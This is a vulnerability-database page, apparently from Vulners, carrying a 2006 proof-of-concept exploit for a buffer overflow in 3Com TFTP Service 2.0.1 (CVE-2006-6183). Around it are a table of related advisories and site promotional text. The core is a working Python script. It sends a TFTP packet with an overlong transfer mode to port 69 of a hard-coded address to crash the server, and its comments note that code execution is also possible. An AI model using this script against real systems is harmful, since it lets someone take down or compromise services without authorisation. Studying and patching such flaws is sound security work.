3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow (PoC)
| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
| 3Com TFTP Service <= 2.0.1 Remote Buffer Overflow Exploit (meta) | 21 Jan 200700:00 | – | zdt | |
| Immunity Canvas: 3COMTFTP | 1 Dec 200600:28 | – | canvas | |
| 3CTftpSvc Long Transport Mode Remote Overflow | 28 Nov 200600:00 | – | nessus | |
| CVE-2006-6183 | 9 May 201000:00 | – | circl | |
| 3Com TFTP Server Transporting Mode Remote Buffer Overflow (CVE-2006-6183) | 15 Jan 200700:00 | – | checkpoint_advisories | |
| CVE-2006-6183 | 1 Dec 200600:00 | – | cve | |
| CVE-2006-6183 | 1 Dec 200600:00 | – | cvelist | |
| 3Com TFTP Service (3CTftpSvc) - 'Mode' Remote Buffer Overflow (Metasploit) | 9 May 201000:00 | – | exploitdb | |
| 3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Remote Overflow | 30 Nov 200600:00 | – | exploitdb | |
| 3Com TFTP Service (3CTftpSvc) 2.0.1 - Remote Buffer Overflow (Metasploit) | 21 Jan 200700:00 | – | exploitdb |
10
#!/usr/bin/python
# Buffer Overflow (Long transporting mode) Vulnerability Exploit
# This is just a DoS exploiting code
# Tested on Windows xp SP2
#
# Requires python and impacket
#
# Coded by Liu Qixu Of NCNIPC
# SUMMARY:
# 3CTftpSvc TFTP Server is a Freeware TFTP server for Windows 9x/NT/XP.
# (http://support.3com.com/software/utilities_for_windows_32_bit.htm
# or ftp://ftp.3com.com/pub/utilbin/win32/3CTftpSvc.zip)
# It provides an implementation of the TFTPv2 protocol.
# A vulnerability has been identified in 3CTftpSvc TFTP Server, which could be exploited by attackers
# to execute arbitrary commands or cause a denial of service. This flaw is
# due to a buffer overflow error when handling an overly long transporting
# mode (more than 470 bytes) passed to a "GET" or "PUT" command, which could
# be exploited by malicious users to compromise a vulnerable system or crash
# an affected application.
# EXPLOIT:
import socket
import sys
host = '192.168.1.11'
port = 69
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
filename = "A"
mode = "netascii" + "A" * 469
da = "\x00\x02" + filename + "\0" + mode + "\0"
s.sendto(da, (host, port))
# milw0rm.com [2006-11-27]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Oct 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.7057